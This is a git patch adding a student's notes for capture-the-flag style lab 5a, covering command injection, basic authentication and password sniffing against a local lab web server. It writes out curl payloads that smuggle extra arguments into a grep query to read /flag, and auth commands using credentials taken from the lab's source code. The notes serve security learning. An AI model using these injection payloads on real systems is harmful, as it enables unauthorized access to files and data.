From c39c5bb862a31049eb0cd9ebbe17f1f1d87ef471 Mon Sep 17 00:00:00 2001
From: Kaushik Narayan R <rknarayan02@gmail.com>
Date: Fri, 22 Nov 2024 11:46:48 -0700
Subject: [PATCH] moving into project 5 - lab 5a

---
 Dojo Notes.md | 27 +++++++++++++++++++++++++++
 1 file changed, 27 insertions(+)

diff --git a/Dojo Notes.md b/Dojo Notes.md
index 3281977..601fd75 100644
--- a/Dojo Notes.md	
+++ b/Dojo Notes.md	
@@ -543,3 +543,30 @@ done
 ### lab 4d.3 - off by one pivot
 
 honestly idk just check class vid and script
+
+### lab 5a.1 - get command injection
+
+- unsanitized url query param as grep input
+- string is in double quotes
+- `curl 'http://lab.localhost?username=pwn.*"+"/flag'`
+  - double quotes to break the string input
+  - `+` to insert space after name in grep
+  - add target path to search in
+
+### lab 5a.2 - post command injection
+
+- similar, except post request this time
+- string is in single quotes
+- `curl -X POST 'http://lab.localhost' -d "username=pwn.*'+'/flag"`
+
+### lab 5a.3 - basic authentication
+
+- basic auth, creds in source code
+- format: `<username>:<password>` and it has to be base64 encoded
+- `curl 'http://lab.localhost' -H "Authorization: Basic $(printf "0c001:acidburn" | base64)"`
+- or easier: `curl 'http://lab.localhost' -u "0c001:acidburn"`
+
+### lab 5a.4 - session hijack
+
+- not really session hijack, flag is the password, sent in plaintext
+- tcpdump access given, done